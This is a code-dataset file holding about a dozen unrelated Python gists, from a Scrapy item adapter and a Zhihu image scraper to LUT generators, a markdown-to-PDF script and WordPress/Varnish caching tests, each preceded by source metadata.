dfs(child)
stack.pop()
dfs(node_index)
return paths
def __merge_terminals2_paths(v_path, u_path):
s, n, m = 0, len(v_path), len(u_path)
while s < min(n, m) and v_path[s] == u_path[s]:
s += 1
prefix = list(reversed(v_path[s:]))
lca = v_path[s - 1]
suffix = u_path[s:]
return prefix, lca, suffix
def __raw_tree_paths(ast, node_index, args):
tnodes = __terminals(ast, node_index, args)
tree_paths = []
for (v_path, v_value), (u_path, u_value) in itertools.combinations(
iterable=tnodes,
r=2,
):
prefix, lca, suffix = __merge_terminals2_paths(v_path, u_path)
if (len(prefix) + 1 + len(suffix) <= args.max_path_length) \
and (abs(len(prefix) - len(suffix)) <= args.max_path_width):
path = prefix + [lca] + suffix
tree_path = v_value, path, u_value
tree_paths.append(tree_path)
return tree_paths
def __delim_name(name):
if name.startswith("@R_") and name.endswith("@"):
return name
if name in {METHOD_NAME, NUM}:
return name
def camel_case_split(identifier):
matches = re.finditer(
'.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)',
identifier,
)
return [m.group(0) for m in matches]
blocks = []
for underscore_block in name.split('_'):
for bar_block in underscore_block.split('|'):
blocks.extend(camel_case_split(bar_block))
return '|'.join(block.lower()[:50] for block in blocks)
def __collect_sample(ast, fd_index, args):
root = ast[fd_index]
if root['type'] != 'funcdef':
raise ValueError('Wrong node type.')
target = ast[fd_index + 2]['value']
tree_paths = __raw_tree_paths(ast, fd_index, args)
contexts = []
for tree_path in tree_paths:
start, connector, finish = tree_path
start, finish = __delim_name(start), __delim_name(finish)
connector = '|'.join(ast[v]['type'] for v in connector)
context = f'{start},{connector},{finish}'
contexts.append(context)
if len(contexts) == 0:
return None
target = __delim_name(target)
context = ' '.join(contexts)
return f'{target} {context}'
def __collect_samples(as_tuple):
ast = json.loads(as_tuple[0])
args = as_tuple[1]
samples = []
for node_index, node in enumerate(ast['ast']):
if node['type'] == 'funcdef':
sample = __collect_sample(ast['ast'], node_index, args)
if sample is not None:
samples.append((ast['from_file'], sample))
return samples
def __collect_all_and_save(asts, args, output_file):
targets = [ (ast, args) for ast in asts ]
pool = multiprocessing.Pool()
samples = list(itertools.chain.from_iterable(tqdm.tqdm(
pool.imap_unordered(__collect_samples, targets, len(targets) // args.n_jobs),
desc=" + Collecting and saving to: '{}'".format(output_file),
total=len(targets)
)))
with open(output_file, 'w') as f:
for line_index, (from_file, line) in enumerate(samples):
f.write(from_file + ' ' + line + ('' if line_index == len(samples) - 1 else '\n'))
def main():
print("Collecting python ASTs (extract.py):")
args = parser.parse_args()
np.random.seed(args.seed)
data_dir = Path(args.data_dir)
train = __collect_asts(data_dir / 'train.json')
test = __collect_asts(data_dir / 'test.json')
valid = __collect_asts(data_dir / 'valid.json')
output_dir = Path(args.output_dir)
output_dir.mkdir(exist_ok=True)
for split_name, split in zip(
('train', 'valid', 'test'),
(train, valid, test),
):
output_file = output_dir / f'{split_name}_output_file.txt'
__collect_all_and_save(split, args, output_file)
print("Checking for baseline.json...")
if (data_dir / 'baseline.json').exists():
print(" + Exists")
output_file = output_dir / f'baseline_output_file.txt'
__collect_all_and_save(split, args, output_file)
print("Complete!")
if __name__ == '__main__':
main()
``` |
{
"source": "jjhenkel/dockerizeme",
"score": 3
} |
#### File: hard-gists/00056d4304c58a035c87cdf5ff1e5e3e/snippet.py
```python
import copy
from scrapy import Item
class ModelItem(Item):
"""
Make Peewee models easily turn into Scrapy Items.
>>> from models import Player
>>> item = ModelItem(Player())
"""
def __init__(self, model, **kwds):
super(self.__class__, self).__init__()
self._model = model
for key in model._meta.fields.keys():
self.fields[key] = Field()
if kwds is not None:
for key, processor in kwds.iteritems():
self.fields[key] = Field(input_processor=MapCompose(
strip_whitespace, processor
))
def __setitem__(self, key, value):
if key not in self.fields:
self.fields[key] = Field()
self._values[key] = value
def copy(self):
return copy.deepcopy(self)
@property
def model(self):
return self._model
```
#### File: hard-gists/035dc3b722b7f89cce66520dde285c9a/snippet.py
```python
import sys
from argparse import ArgumentParser
from swift.common.direct_client import direct_get_suffix_hashes
from swift.common.storage_policy import POLICIES
parser = ArgumentParser()
parser.add_argument('--policy-index', default=0, help='policy index')
parser.add_argument('part', help='the part')
parser.add_argument('-s', '--suffix', nargs='*',
help='any suffixes to recalculate')
parser.add_argument('-d', '--device', help='limit command to single node')
def main():
args = parser.parse_args()
policy = POLICIES[args.policy_index]
policy.load_ring('/etc/swift/')
ring = policy.object_ring
suffixes = args.suffix or []
for node in ring.devs:
if node is None:
continue
if args.device and node['device'] != args.device:
continue
data = direct_get_suffix_hashes(
node, args.part, suffixes, headers={
'x-backend-storage-policy-index': int(policy)})
print node['ip'], node['port'], node['device']
print data
if __name__ == "__main__":
sys.exit(main())
```
#### File: hard-gists/037e4134d8271c0de71b838a461e7ac1/snippet.py
```python
import requests
import re
import json
import time
from PIL import Image
import cStringIO
import cookielib
import urllib
import os
api_url='https://www.zhihu.com/node/QuestionAnswerListV2'
login_url='https://www.zhihu.com/login/'
topic_url='https://www.zhihu.com/question/'
headers={
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
}
session=requests.Session()
session.headers=headers
session.cookies = cookielib.LWPCookieJar(filename='cookies')
try:
session.cookies.load(ignore_discard=True)
except:
print u"未登陆过,需先登录"
def get_xsrf(url="http://www.zhihu.com"):
'''''_xsrf 是一个动态变化的参数'''
global session
index_url = url
index_page = session.get(index_url)
html = index_page.content
pattern = r'name="_xsrf" value="(.*?)"'
_xsrf = re.findall(pattern, html)
return _xsrf[0]
def ImageScale(url,session=None):
if session==None:
session=requests.Session()
file = cStringIO.StringIO(session.get(url).content)
img = Image.open(file)
img.show()
def get_captcha():
global session
t=str(int(time.time()*1000))
captcha_url='https://www.zhihu.com/captcha.gif?r=%s&type=login'%t
print captcha_url
ImageScale(captcha_url,session)
print u'请输入验证码:'
yzm=raw_input()
return yzm
def isLogin():
global session
url = "https://www.zhihu.com/settings/profile"
login_code = session.get(url, allow_redirects=False).status_code
if int(x=login_code) == 200:
return True
else:
return False
def login(email,passwd):
global session
isemail=re.search('@',email)
if isemail:
loginurl=login_url+'email'
data={'_xsrf':get_xsrf()
,'password':<PASSWORD>
,'remember_me':'true'
,'email':email}
else:
loginurl=login_url+'phone_num'
data={'_xsrf':get_xsrf()
,'password':<PASSWORD>
,'remember_me':'true'
,'phone_num':email}
try:
login_page=session.post(loginurl,data=data)
login_code=login_page.content
print login_page.status
print login_code
except:
data['captcha']=get_captcha()
login_page=session.post(loginurl,data=data)
login_code=json.loads(login_page.content)
print login_code['msg']
session.cookies.save()
def get_pic_from_topic(id,offset):
global session
topicurl=topic_url+str(id)
_xsrf=get_xsrf(topicurl)
pic_re=re.compile('data-actualsrc="(.*?)"')
inner_data={"url_token":id
,"pagesize":10
,"offset":offset
}
data={'method':'next'
,'params':json.dumps(inner_data)
}
session.headers['Referer']=topicurl
session.headers['Host']='www.zhihu.com'
session.headers['Origin']='https://www.zhihu.com'
session.headers['X-Xsrftoken']=_xsrf
js_data=session.post(api_url,data=data)
dat=json.loads(js_data.content)['msg']
pictures=[]
for d in dat:
pics=pic_re.findall(d)
picss=[re.sub('_b','_r',x) for x in pics]
pictures.extend(picss)
return pictures
def downloader(url,path):
try:
filename=url.split('/')[-1]
save=os.path.join(path,filename)
print u'开始下载 ',filename
urllib.urlretrieve(url,filename=save)
except Exception,e:
print u'下载出错,错误信息为:'
print e
if __name__=='__main__':
email='知乎账号'
passwd='<PASSWORD>'
is_login=isLogin()
if not is_login:
login(email,passwd)
offset=0
pictures=[]
print u"""####################\n# 知乎图片下载器 #\n####################
"""
print u"请输入知乎问题id,比如https://www.zhihu.com/question/52049909,id就是52049909"
id=input()
print u'=====开始解析======'
while 1:
print u"+++++正在解析第%d页+++++"%(offset/10+1)
pics=get_pic_from_topic(id,offset)
if len(pics)==0:
print u"解析完毕,共找到%d张图片"%len(pictures)
break
pictures.extend(pics)
offset+=10
print u"=====开始下载图片====="
basepath=os.path.abspath('.')
savepath=os.path.join(basepath,str(id))
if not os.path.exists(savepath):
os.mkdir(savepath)
for pic in pictures:
downloader(pic,savepath)
print u"=====下载完毕====="
```
#### File: hard-gists/09b1f5403c63ceab5ae34710cbe2809e/snippet.py
```python
import cv2
import numpy as np
def make_lut256x16(exportPath):
''' 256 x 16 LUT '''
colors = []
for y in range(0, 16):
rows = []
for x in range(0, 256):
rows.append([
(x / 16) * 16, # blue
y * 16, # green
(x % 16) * 16 # red
])
colors.append(rows)
image = np.array(colors)
if exportPath:
cv2.imwrite(exportPath, image)
return image
def make_lut1024x32(exportPath):
''' 1024 x 32 LUT '''
colors = []
for y in range(0, 32):
rows = []
for x in range(0, 1024):
rows.append([
(x / 32) * 8, # blue
y * 8, # green
(x % 32) * 8 # red
])
colors.append(rows)
image = np.array(colors)
if exportPath:
cv2.imwrite(exportPath, image)
return image
def make_lut512x512(exportPath):
''' 512 x 512 Basic LUT '''
colors = []
for y in range(0, 512):
rows = []
for x in range(0, 512):
i = (x % 64, y % 64)
rows.append([ # BGR
(y / 2 + x / 16), # blue
i[1] * 4, # green
i[0] * 4 # red
])
colors.append(rows)
image = np.array(colors)
if exportPath:
cv2.imwrite(exportPath, image)
return image
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description='LUT Texture maker')
parser.add_argument('path',
type=str,
nargs='?',
default='lut.png',
help='output filename')
parser.add_argument('-s', '--size',
type=str,
nargs='?',
default='512x512',
help='256x16 or 1024x32 or 512x512')
args = parser.parse_args()
if args.size == '512x512':
make_lut512x512(args.path)
elif args.size == '256x16':
make_lut256x16(args.path)
elif args.size == '1024x32':
make_lut1024x32(args.path)
else:
sys.exit('Unsupported size')
```
#### File: hard-gists/0acf77b2c022e2467cfb0d5493d454d6/snippet.py
```python
from django import template
register = template.Library()
@register.filter(name='urltoname')
def urltoname(value):
"filter that extracts the filename from a URL"
x = str(value)
return x[x.rfind("/")+1:]
```
#### File: hard-gists/0b942dd86f01efe996b8977b158c37a6/snippet.py
```python
from urllib.parse import urlencode
from datetime import date, timedelta
import requests
def currency_conversion_rate(base, target, that_date='latest'):
"""
get the currency conversion rate for the specific date
"""
main_api = 'http://api.fixer.io/{}?'.format(that_date)
url = main_api + urlencode({'base':base})
json_data = requests.get(url).json()
try:
result = json_data['rates'][target]
# except requests.exceptions.ConnectionError:
# result = "Connection Error"
except KeyError:
result = 0.00
return result
def main(base, target, start_date, end_date):
step = timedelta(days=1)
total_days = 0
total_amount_sum = 0
while start_date < end_date:
that_date = start_date.strftime("%Y-%m-%d")
amount = currency_conversion_rate(base, target, that_date)
if amount != 0:
# because on fixer.io gives exchange rates for working days
# so we're only considering the days when we do have a rate available
# for more on this: https://github.com/hakanensari/fixer-io/issues/47
total_amount_sum += amount
total_days += 1
print(that_date, amount)
start_date += step
print(total_amount_sum/total_days)
if __name__ == '__main__':
START_DATE = date(2017, 8, 1)
END_DATE = date(2017, 8, 15)
main('USD', 'INR', START_DATE, END_DATE)
```
#### File: hard-gists/0d1baad4e3a871587ab1/snippet.py
```python
from tkinter import *
from tkinter import ttk
from tkinter.filedialog import askopenfilename
root = Tk( )
#This is where we lauch the file manager bar.
def OpenFile():
name = askopenfilename(initialdir="C:/Users/Batman/Documents/Programming/tkinter/",
filetypes =(("Text File", "*.txt"),("All Files","*.*")),
title = "Choose a file."
)
print (name)
#Using try in case user types in unknown file or closes without choosing a file.
try:
with open(name,'r') as UseFile:
print(UseFile.read())
except:
print("No file exists")
Title = root.title( "File Opener")
label = ttk.Label(root, text ="I'm BATMAN!!!",foreground="red",font=("Helvetica", 16))
label.pack()
#Menu Bar
menu = Menu(root)
root.config(menu=menu)
file = Menu(menu)
file.add_command(label = 'Open', command = OpenFile)
file.add_command(label = 'Exit', command = lambda:exit())
menu.add_cascade(label = 'File', menu = file)
root.mainloop()
'''
RESULTS:
>>>
C:/Users/Scott/Documents/Programming/json/test.txt
"I like to move it, groove it!"
'''
```
#### File: hard-gists/0d5a709bbb4186d1f45f2af14c65b110/snippet.py
```python
from objc_util import *
import threading
from io import BytesIO
from PIL import Image
import sys
import ui
import ctypes
NSBundle.bundleWithPath_('/System/Library/Frameworks/Photos.framework').load()
PHAsset = ObjCClass('PHAsset')
PHImageManager = ObjCClass('PHImageManager')
PHImageRequestOptions = ObjCClass('PHImageRequestOptions')
mgr = PHImageManager.defaultManager()
def nsdata2str(data):
return ctypes.string_at(data.bytes(), data.length())
class Asset (object):
def __init__(self, asset_obj):
self._asset = asset_obj
def __repr__(self):
return repr(self._asset)
def fetch_data(self):
'''Return a tuple of (UTI, data) for the asset. Both are strings, the UTI indicates the file type (e.g. 'public.jpeg').'''
e = threading.Event()
result = {}
def handler(_cmd, _data, _uti, orientation, _info):
if _data:
result['data'] = nsdata2str(ObjCInstance(_data))
result['uti'] = str(ObjCInstance(_uti))
result['orientation'] = orientation
result['info'] = ObjCInstance(_info)
e.set()
handler_block = ObjCBlock(handler, restype=None, argtypes=[c_void_p, c_void_p, c_void_p, NSInteger, c_void_p])
options = PHImageRequestOptions.new().autorelease()
options.networkAccessAllowed = True
options.synchronous = True
mgr.requestImageDataForAsset_options_resultHandler_(self._asset, options, handler_block)
e.wait()
return result
def fetch_ui_thumbnail(self):
a = self._asset
options = PHImageRequestOptions.new().autorelease()
options.networkAccessAllowed = True
options.synchronous = True
target_size = CGSize(80, 80)
result = {}
e = threading.Event()
def handler(_cmd, _result, _info):
result['image'] = ObjCInstance(_result)
e.set()
handler_block = ObjCBlock(handler, restype=None, argtypes=[c_void_p, c_void_p, c_void_p])
mgr.requestImageForAsset_targetSize_contentMode_options_resultHandler_( a, target_size, 0, options, handler_block)
e.wait()
return result['image']
def fetch_image(self):
'''Return the asset as a decoded PIL Image object.'''
info = self.fetch_data()
img_data = info['data']
orientation = info['orientation']
b = BytesIO(img_data)
img = Image.open(b)
# NOTE: Mirrored orientations are not supported here.
orientations = {1: 180, 2: 90, 3: -90}
rotation = orientations.get(orientation, 0)
if rotation != 0:
img = img.rotate(rotation)
return img
UICollectionView = ObjCClass('UICollectionView')
UICollectionViewFlowLayout = ObjCClass('UICollectionViewFlowLayout')
UICollectionViewCell = ObjCClass('UICollectionViewCell')
UIImageView = ObjCClass('UIImageView')
UIColor = ObjCClass('UIColor')
def collectionView_numberOfItemsInSection_(_self, _cmd, _cv, _sec):
ds = ObjCInstance(_self)
return len(ds.assets)
collectionView_numberOfItemsInSection_.encoding = 'q32@0:8@16q24'
def collectionView_cellForItemAtIndexPath_(_self, _cmd, _cv, _ip):
ds = ObjCInstance(_self)
ip = ObjCInstance(_ip)
cv = ObjCInstance(_cv)
asset = ds.assets[ip.item()]
thumb = asset.fetch_ui_thumbnail()
cell = cv.dequeueReusableCellWithReuseIdentifier_forIndexPath_('Cell', ip)
iv = cell.viewWithTag_(123)
if not iv:
iv_frame = cell.bounds()
iv = UIImageView.alloc().initWithFrame_(iv_frame).autorelease()
iv.setTag_(123)
iv.setContentMode_(2)
iv.setClipsToBounds_(True)
iv.setAutoresizingMask_(18)
cell.addSubview_(iv)
iv.setImage_(thumb)
return cell.ptr
collectionView_cellForItemAtIndexPath_.encoding = '@32@0:8@16@24'
def collectionView_didSelectItemAtIndexPath_(_self, _cmd, _cv, _ip):
ds = ObjCInstance(_self)
ds.selected_asset_index = ObjCInstance(_ip).item()
ds.asset_collection_view.close()
collectionView_didSelectItemAtIndexPath_.encoding = 'v32@0:8@16@24'
methods = [collectionView_numberOfItemsInSection_, collectionView_cellForItemAtIndexPath_, collectionView_didSelectItemAtIndexPath_]
DataSource = create_objc_class('DataSource', methods=methods, protocols=['UICollectionViewDelegateFlowLayout', 'UICollectionViewDataSource', 'UICollectionViewDelegate'])
class AssetCollectionView (ui.View):
def __init__(self, *args, **kwargs):
ui.View.__init__(self, *args, **kwargs)
layout = UICollectionViewFlowLayout.alloc().init().autorelease()
layout.itemSize = CGSize(80, 80)
layout.sectionInset = UIEdgeInsets(8, 8, 8, 8)
frame = ((0, 0), (self.bounds.width, self.bounds.height))
cv = UICollectionView.alloc().initWithFrame_collectionViewLayout_(frame, layout)
cv.backgroundColor = UIColor.whiteColor()
cv.registerClass_forCellWithReuseIdentifier_(UICollectionViewCell, 'Cell')
ds = DataSource.alloc().init().autorelease()
res = PHAsset.fetchAssetsWithMediaType_options_(1, None)
ds.assets = [Asset(res.objectAtIndex_(i)) for i in xrange(res.count())]
ds.asset_collection_view = self
self.data_source = ds
cv.dataSource = ds
cv.delegate = ds
cv.setAlwaysBounceVertical_(True)
cv.setAutoresizingMask_(18)
ObjCInstance(self._objc_ptr).addSubview_(cv)
def pick_asset():
av = AssetCollectionView(frame=(0, 0, 540, 576))
av.name = 'All Photos'
av.present('sheet')
av.wait_modal()
if hasattr(av.data_source, 'selected_asset_index'):
asset = av.data_source.assets[av.data_source.selected_asset_index]
return asset
else:
return None
# Demo:
def main():
asset = pick_asset()
if asset:
img = asset.fetch_image()
img.show()
else:
print 'No image picked'
if __name__ == '__main__':
main()
```
#### File: hard-gists/0efb4d07f28af1c8fc1b/snippet.py
```python
html {
font-family: Arial, Helvetica, sans-serif;
font-size: 12pt;
}
\"""
markdown2pdf(text, 'test.pdf', css=DEFAULT_CSS)
See the [xhtml2pdf usage guide] [5] for more information on the supported CSS
properties and page layout directives.
Requirements
------------
The `markdown2pdf` module requires the following Python packages:
* [markdown2] [3] \*
* [html5lib](http://pypi.python.org/pypi/html5lib) \*
* PIL or [Pillow](http://python-pillow.github.io/) (optional) \*
* [PyPDF2](http://mstamy2.github.io/PyPDF2/) (optional)
* [ReportLab](http://reportlab.com)
* [xhtml2pdf] [4]
Packages marked with an asterisk are already included with Pythonista. All
these packages, except PIL / Pillow, are pure-Python code or the included
C extensions are optional (ReportLab).
Installation
------------
I have created a bundle of all the above libraries, which are not already
included in Pythonista, as a Zip archive. You have to extract this archive into
the `site-packages` sub-directory of your Pythonista document folder. You can
use the following code in the Pythonista console to download and extract the
Zip archive:
import os, requests, zipfile
ZIPFN = 'markdown2pdf.zip'
ZIPURL = 'http://chrisarndt.de/projects/markdown2pdf/' + ZIPFN
with open(ZIPFN, 'wb') as f:
f.write(requests.get(ZIPURL).content)
with zipfile.ZipFile(ZIPFN) as z:
z.extractall('site-packages')
os.unlink(ZIPFN)
You can also download a version of the above script, which also checks the
integrity of the downloaded Zip file, from this Gist:
[download_md2pdf.py](https://gist.github.com/SpotlightKid/9e03a7823827a1841b6b)
[1]: http://daringfireball.net
[2]: http://omz-software.com/pythonista
[3]: https://github.com/trentm/python-markdown2
[4]: http://www.xhtml2pdf.com
[5]: https://github.com/chrisglass/xhtml2pdf/blob/master/doc/usage.rst
"""
__author__ = '<NAME>'
__version__ = '1.1'
import argparse
import logging
import os
import sys
import tempfile
from os.path import basename, join, splitext
import console
import editor
from markdown2pdf import markdown2pdf
def make_pdf_filename(fn):
return splitext(basename(fn))[0] + '.pdf'
def main(args=None):
ap = argparse.ArgumentParser()
ap.add_argument('-c', '--current-file', action='store_true',
help='Use file currently opened in editor as input')
ap.add_argument('-e', '--edit-buffer', action='store_true',
help='Use content of current editor buffer as input')
ap.add_argument('infile', nargs='?', help='Input file name')
args = ap.parse_args(args if args is not None else sys.argv[1:])
if args.edit_buffer or args.current_file:
pdf_bn = make_pdf_filename(editor.get_path())
if args.current_file:
with open(editor.get_path()) as f:
md = f.read()
elif args.edit_buffer:
md = editor.get_text()
elif args.infile:
pfd_bn = make_pdf_filename(args.infile)
with open(args.infile) as f:
md = f.read()
else:
pdf_bn = 'markdown2pdf.pdf'
try:
choice = console.alert('Markdown to PDF', '',
'Show README', 'Convert Clipboard', 'Convert URL')
except KeyboardInterrupt:
return
if choice == 1:
md = __doc__
elif choice == 2:
import clipboard
md = clipboard.get()
elif choice == 3:
import re
import clipboard
try:
cb = clipboard.get().strip()
if not re.search('^(ht|f)tps?://', cb):
cb = ''
url = console.input_alert('Enter URL', 'Download Markdown from URL:',
cb, 'Download')
except KeyboardInterrupt:
return
else:
import urllib2
import urlparse
try:
r = urllib2.urlopen(url)
except urllib2.URLError as exc:
print(exc)
console.hud_alert("Download error (see console)", 'error')
return
else:
md = r.read()
url = urlparse.urlparse(r.geturl())
fn = make_pdf_filename(url.path)
if fn:
pdf_bn = fn
if not md:
return
tempdir = tempfile.mkdtemp()
pdf_path = join(tempdir, pdf_bn)
console.show_activity()
status = markdown2pdf(md, pdf_path)
console.hide_activity()
try:
choice = console.alert('Select Ouput', '',
'Save to file...', 'Open in...', 'View')
except KeyboardInterrupt:
return
if choice == 1:
try:
filename = console.input_alert("Filename",
"Enter PDF output filename\n(will overwrite existing files!):",
pdf_bn, 'Save')
os.rename(pdf_path, filename)
except KeyboardInterrupt:
return
except (IOError, OSError) as exc:
console.alert("Error", "Error writing PDF file:\n\n%s" % exc)
return 1
elif choice == 2:
console.open_in(pdf_path)
elif choice == 3:
console.quicklook(pdf_path)
try:
os.unlink(pdf_path)
os.rmdir(tempdir)
except: pass
if __name__ == '__main__':
logging.basicConfig(level=logging.ERROR)
main(sys.argv[1:])
```
#### File: hard-gists/0f87efc363309e99d600e3a6300fbcff/snippet.py
```python
from gimpfu import *
import time
import json
gettext.install("gimp20-python", gimp.locale_directory, unicode=True)
def add_layers(img, layer, classes):
gimp.context_push()
img.undo_group_start()
if img.base_type is RGB:
type = RGBA_IMAGE
else:
type = GRAYA_IMAGE
cl_list = json.loads(classes)
for c in cl_list:
layer = gimp.Layer(img, c,
layer.width, layer.height, type, 100, NORMAL_MODE)
layer.fill(TRANSPARENT_FILL)
img.insert_layer(layer)
img.undo_group_end()
gimp.context_pop()
register(
"python-fu-addlayer",
N_("Add layers stack"),
"Add layers",
"<NAME>",
"<NAME>",
"2017",
N_("_Add layers"),
"RGB*, GRAY*",
[
(PF_IMAGE, "image", "Input image", None),
(PF_DRAWABLE, "drawable", "Input drawable", None),
(PF_STRING, "classes", _("_Json list"), '["1","2","3","4","5","6","7","8","9"]'),
],
[],
add_layers,
menu="<Image>/Filters/Tools",
domain=("gimp20-python", gimp.locale_directory)
)
main()
```
#### File: hard-gists/10011921/snippet.py
```python
from apiclient import discovery
from oauth2client import appengine
from oauth2client import client
from google.appengine.api import memcache
import webapp2
import jinja2
import httplib2
import os
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
autoescape=True,
extensions=['jinja2.ext.autoescape'])
# CLIENT_SECRETS, name of a file containing the OAuth 2.0 information for this
# application, including client_id and client_secret, which are found
# on the API Access tab on the Google APIs
# Console <http://code.google.com/apis/console>
CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json')
# Helpful message to display in the browser if the CLIENT_SECRETS file
# is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
<h1>Por favor configure OAuth 2.0</h1>
<p>
<code>%s</code>.
</p>
""" % CLIENT_SECRETS
http = httplib2.Http(memcache)
service = discovery.build("plus", "v1", http=http)
decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/plus.me',
message=MISSING_CLIENT_SECRETS_MESSAGE)
class MainHandler(webapp2.RequestHandler):
@decorator.oauth_aware
def get(self):
variables = {
'url': decorator.authorize_url(),
'has_credentials': decorator.has_credentials()
}
template = JINJA_ENVIRONMENT.get_template('conceder.html')
self.response.write(template.render(variables))
class Social(webapp2.RequestHandler):
@decorator.oauth_required
def get(self):
try:
http = decorator.http()
user = service.people().get(userId='me').execute(http=http)
text = 'Hola, %s!' % user['displayName']
image = user['image']['url']
cover = user['cover']['coverPhoto']['url']
template = JINJA_ENVIRONMENT.get_template('bienvenido.html')
self.response.write(template.render({'text': text,
'image': image,
'cover': cover
}))
except client.AccessTokenRefreshError:
self.redirect('/')
application = webapp2.WSGIApplication(
[
('/', MainHandler),
('/social', Social),
(decorator.callback_path, decorator.callback_handler()),
],
debug=True)
```
#### File: hard-gists/1052286/snippet.py
```python
import cookielib
import json
import re
import random
import unittest
import requests
from wordpress_xmlrpc import Client, WordPressComment, WordPressPost
from wordpress_xmlrpc.methods.posts import EditPost, DeletePost, GetPost, NewPost
from wordpress_xmlrpc.methods.comments import EditComment, DeleteComment, NewComment
DOMAIN = 'chicagonow.dev'
USERNAME = 'admin'
PASSWORD = 'password'
TEST_BLOG = 'cta-tattler'
MAX_AGE_REGEX = re.compile('max-age\s*=\s*(\d+)')
def build_url(path):
"""
Construct an absolute url by appending a path to a domain.
"""
return 'http://%s%s' % (DOMAIN, path)
class TestCachingBase(unittest.TestCase):
"""
Base class Wordpress + Varnish TestCases.
Provides utils for login/logout and asserting hits/misses.
"""
def login(self):
"""
Login and return a cookie jar holding the login cookie.
"""
cookies = cookielib.CookieJar()
response = requests.post(
build_url('/wp-admin/admin-ajax.php'),
cookies=cookies,
data = {
'action': 'chicagonow',
'url': 'users/login',
'data': '{"user_email":"%s","user_pass":"%s"}' % (USERNAME, PASSWORD)
}
)
self.assertEqual(response.status_code, 200)
self.assertMiss(response)
return cookies
def logout(self, cookies):
"""
Logout and return a now-empty cookie jar.
"""
response = requests.post(
build_url('/wp-admin/admin-ajax.php'),
cookies=cookies,
data = {
'action': 'chicagonow',
'url': 'users/logout'
}
)
self.assertEqual(response.status_code, 200)
self.assertMiss(response)
response_json = json.loads(response.read())
self.assertEqual(response_json['logged_out'], True)
return cookies
def get_xmlrpc(self, blog=None):
"""
Fetch an XML-RPC client for a given blog (or the root blog).
"""
if blog:
path = '/%s/xmlrpc.php' % blog
else:
path = '/xmlrpc.php'
return Client(build_url(path), USERNAME, PASSWORD)
def new_post(self, blog):
"""
Create a new post.
"""
xmlrpc = self.get_xmlrpc(blog)
post = WordPressPost()
post.title = 'New post from api'
post.description = 'New description'
return xmlrpc.call(NewPost(post, True))
def edit_post(self, blog, post_id):
"""
Edit a post.
"""
xmlrpc = self.get_xmlrpc(blog)
post = WordPressPost()
post.title = 'Edited post from api'
post.description = 'Edited description'
return xmlrpc.call(EditPost(post_id, post, True))
def delete_post(self, blog, post_id):
"""
Delete a post.
"""
xmlrpc = self.get_xmlrpc(blog)
return xmlrpc.call(DeletePost(post_id))
def get_post(self, blog, post_id):
"""
Fetch a post object.
"""
xmlrpc = self.get_xmlrpc(blog)
return xmlrpc.call(GetPost(post_id))
def new_comment(self, blog, post_id):
"""
Create a new comment.
"""
xmlrpc = self.get_xmlrpc(blog)
comment = WordPressComment()
comment.content = 'Test comment from api. (%s)' % str(random.random() * 99999999)
return xmlrpc.call(NewComment(post_id, comment))
def edit_comment(self, blog, comment_id):
"""
Edit a comment.
"""
xmlrpc = self.get_xmlrpc(blog)
comment = WordPressComment()
comment.content = 'Edited comment from api. (%s)' % str(random.random() * 99999999)
return xmlrpc.call(EditComment(comment_id, comment))
def delete_comment(self, blog, comment_id):
"""
Delete a comment.
"""
xmlrpc = self.get_xmlrpc(blog)
return xmlrpc.call(DeleteComment(comment_id))
def get_twice(self, url, **kwargs):
"""
Fetch a url twice and return the second response (for testing cache hits).
"""
requests.get(url, **kwargs)
response = requests.get(url, **kwargs)
return response
def assertHit(self, response):
"""
Assert that a given response contains the header indicating a cache hit.
"""
self.assertEqual(response.headers['X-Cache'], 'Hit')
def assertMiss(self, response):
"""
Assert that a given response contains the header indicating a cache miss.
"""
self.assertEqual(response.headers['X-Cache'], 'Miss')
def assertMaxAge(self, response, value):
"""
Assert that a given response contains the header indicating specific "max-age" value.
"""
try:
cache_control = response.headers['cache-control']
except KeyError:
try:
cache_control = response.headers['Cache-Control']
except:
raise AssertionError('No cache-control header.')
max_age = MAX_AGE_REGEX.match(cache_control)
if not max_age:
raise AssertionError('No max-age specified in cache-control header.')
self.assertEqual(int(max_age.group(1)), value)
class TestLoggedIn(TestCachingBase):
"""
Tests for logged-in users.
"""
def setUp(self):
self.cookies = self.login()
def test_homepage(self):
url = build_url('/')
response = self.get_twice(url, cookies=self.cookies)
self.assertHit(response)
def test_post_preview(self):
url = build_url('/2400-north1200-west/?p=4&preview=true&url=preview/4')
response = requests.get(url, cookies=self.cookies)
self.assertMiss(response)
class TestLoggedOut(TestCachingBase):
"""
Tests for logged-out users.
"""
def test_homepage(self):
url = build_url('/')
response = self.get_twice(url)
self.assertHit(response)
self.assertMaxAge(response, 300)
def test_homepage_login_logout(self):
url = build_url('/')
cookies = self.login()
cookies = self.logout(cookies)
response = self.get_twice(url, cookies=cookies)
self.assertHit(response)
def test_search(self):
url = build_url('/search/')
response = self.get_twice(url, params={ 'blog_s': 'test' })
self.assertMiss(response)
def test_static_content(self):
url = build_url('/wp-content/themes/chicagonow/images/home-logo.png')
response = self.get_twice(url)
self.assertHit(response)
self.assertMaxAge(response, 604800)
def test_avatar(self):
url = build_url('/avatar/user-1-16.png')
response = self.get_twice(url)
self.assertHit(response)
self.assertMaxAge(response, 604800)
def test_ajax_users(self):
url = build_url('/wp-admin/admin-ajax.php')
data = {
'action': 'chicagonow',
'url': 'users',
'data': 'null'
}
response = self.get_twice(url, data=data)
self.assertMiss(response)
def test_ajax_comment_form(self):
url = build_url('/wp-admin/admin-ajax.php')
data = {
'action': 'commentform',
'data': '{ "post_id": 61 }'
}
response = self.get_twice(url, data=data)
self.assertMiss(response)
def test_new_post(self):
url = build_url('/%s/' % TEST_BLOG)
response = self.get_twice(url)
self.assertHit(response)
self.new_post(TEST_BLOG)
response = requests.get(url)
self.assertMiss(response)
def test_edit_post(self):
url = build_url('/%s/' % TEST_BLOG)
post_id = self.new_post(TEST_BLOG)
response = self.get_twice(url)
self.assertHit(response)
self.edit_post(TEST_BLOG, post_id)
response = requests.get(url)
self.assertMiss(response)
